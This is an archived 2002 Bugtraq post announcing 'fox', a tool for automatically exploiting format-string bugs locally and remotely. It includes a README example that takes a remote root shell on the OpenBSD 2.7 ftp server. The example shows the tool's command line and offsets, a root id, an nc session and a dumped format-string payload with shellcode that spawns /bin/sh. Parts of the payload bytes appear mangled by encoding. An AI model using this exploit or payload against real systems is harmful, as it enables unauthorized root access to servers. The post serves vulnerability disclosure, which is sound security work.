Re: Howto exploit a remote format bug automatically

From: Fredrik Widlund (fredrik.widlund@defcom.com)
Date: 04/19/02 

From: Fredrik Widlund <fredrik.widlund@defcom.com>
To: bugtraq@securityfocus.com
Date: Fri, 19 Apr 2002 12:57:52 +0100

Hi

"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
locally and remotely. Runs on OpenBSD and not ported to other platforms,
though it should be very straighforward.

The only requirement is that you get the actual printed string back to the
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a
small shell program since the output occurs in the process listing.

Should work for exploiting bugs on most little-endian 32bit-machines like the
i386 providing you supply the shellcode.

Includes a trivial local example, and an example of how to point it at the
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.

Regards,
Fredrik Widlund

-x-

README for example 2:
Exploiting OpenBSD 2.7 ftp server

Input has to be < 256 characters, working offsets are -18 and -2
Ex:

root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2
alignment 0
chars before argument 111
chars before insert 0
argument offset 9
argument pointer offset 0
argument address 0xdfbfd15c
esp 0xdfbfd138

uid=0(root) gid=0(wheel) groups=0(wheel)
root@wolf> nc 127.0.0.1 21
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD wolf 2.7 GENERIC#0 i386
cat /etc/hosts
127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿
<81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K
<83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª
<81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx
exit
root@wolf>

Quantcast